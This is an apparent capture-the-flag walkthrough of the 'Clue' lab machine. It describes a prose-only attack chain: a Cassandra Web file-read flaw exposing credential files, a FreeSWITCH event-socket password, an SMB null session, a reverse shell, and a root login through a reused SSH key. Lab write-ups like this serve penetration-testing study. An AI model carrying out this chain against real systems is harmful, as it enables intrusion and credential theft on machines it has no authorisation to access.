Clue - Proving Grounds Practice
Enumeration
Nmap
Initial Nmap scan revealed HTTP, SSH, SMB ports and Port 3000, 8021 ports were open.
WEB Enumeration
At first I checked the website at port 80, it only showed forbidden.
Then I checked port 3000, it was Cassandra Web Website.
Exploitation
LFI in Cassandra Web
I checked Cassandra exploits and found one, which is remote file read. (Exploit)
I tried to read /etc/passwd and it worked.
Then I read /proc/self/cmdline and found a password and noted it.
Freeswitch command execution
Then I checked port 8021, it was a freeswitch application. I searched freeswitch pentesting and found this blog .
Tried the default password as suggested but it did not work.
SMB Null Session
Then checked SMB and found out it had null session available.
Then I listed all the files and checked if there is a event_socket.conf.xml file and I found it. This file is used to store fireswitch password.
Then I downloaded the file and read it. It included default password, so it was not useful.
Cassandra Web LFI to read Freeswitch Password
Then I went back to cassandra exploit and tried to read event_socket.conf.xml directly, unlike backup in smb. And it included a different password.
I tried it and it worked.
Fireswitch Command Execution
Then I simply downloaded an script to run commands.
And updated it to include correct password.
Then tried it and it worked.
Later I ran a reverse shell. Note that, listener should run in the same port (8021) as server to communicate.
And I obtained the shell.
I then could not find the user flag, run find command and then found it. It was in freeswitch directory.
Privilege Escalation
Su to cassie
We had password for cassie but linpeas also showed the password. I used it with su and obtained cassie user.
id_rsa
The cassie used had id_rsa file in her home directory.
I tried it against root and it worked.